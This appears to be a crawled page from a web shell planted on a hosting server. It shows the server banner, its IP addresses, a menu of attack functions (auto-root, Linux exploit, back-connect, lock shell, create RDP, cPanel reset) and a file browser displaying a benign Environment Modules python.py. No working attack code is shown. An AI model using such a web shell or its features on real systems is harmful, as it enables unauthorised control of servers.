Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.119.134.213
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
Modules /
init /
[ HOME SHELL ]
Name
Size
Permission
Action
ksh-functions
[ DIR ]
drwxr-xr-x
zsh-functions
[ DIR ]
drwxr-xr-x
bash
4.04
KB
-rw-r--r--
bash_completion
11.2
KB
-rw-r--r--
cmake
1.88
KB
-rw-r--r--
csh
3.78
KB
-rw-r--r--
fish
1.69
KB
-rw-r--r--
fish_completion
9.42
KB
-rw-r--r--
ksh
4.06
KB
-rw-r--r--
lisp
3.15
KB
-rw-r--r--
perl.pm
1.09
KB
-rw-r--r--
profile-compat.csh
197
B
-rw-r--r--
profile-compat.sh
309
B
-rw-r--r--
profile.csh
105
B
-rw-r--r--
profile.sh
448
B
-rw-r--r--
python.py
1.5
KB
-rw-r--r--
r.R
961
B
-rw-r--r--
ruby.rb
1.35
KB
-rw-r--r--
sh
3.91
KB
-rw-r--r--
tcl
1.05
KB
-rw-r--r--
tcsh
3.79
KB
-rw-r--r--
tcsh_completion
5.39
KB
-rw-r--r--
zsh
4.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : python.py
import os, re, subprocess # define modules runtine quarantine configuration os.environ['MODULES_RUN_QUARANTINE'] = 'LD_LIBRARY_PATH LD_PRELOAD' # setup quarantine if defined _mlre = os.environ.copy() if 'MODULES_RUN_QUARANTINE' in os.environ: for _mlv in os.environ['MODULES_RUN_QUARANTINE'].split(): if re.match('^[A-Za-z_][A-Za-z0-9_]*$', _mlv): if _mlv in os.environ: _mlre[_mlv + '_modquar'] = os.environ[_mlv] _mlrv = 'MODULES_RUNENV_' + _mlv if _mlrv in os.environ: _mlre[_mlv] = os.environ[_mlrv] else: _mlre[_mlv] = '' # define module command and surrounding initial environment (default value # for MODULESHOME, MODULEPATH, LOADEDMODULES and parse of init config files) exec(subprocess.Popen(['/usr/bin/tclsh', '/usr/share/Modules/libexec/modulecmd.tcl', 'python', 'autoinit'], stdout=subprocess.PIPE, env=_mlre).communicate()[0]) # clean temp variable used to setup quarantine del _mlre # redefine module command if compat version has been activated if 'MODULES_USE_COMPAT_VERSION' in os.environ and os.environ['MODULES_USE_COMPAT_VERSION'] == '1': os.environ['MODULES_CMD'] = '/usr/share/Modules/libexec/modulecmd-compat' # set module command in accordance with active version def module(command, *arguments): exec(subprocess.Popen(['/usr/share/Modules/libexec/modulecmd-compat', 'python', command] + list(arguments), stdout=subprocess.PIPE).communicate()[0]) # return value as done on new main version return True
Close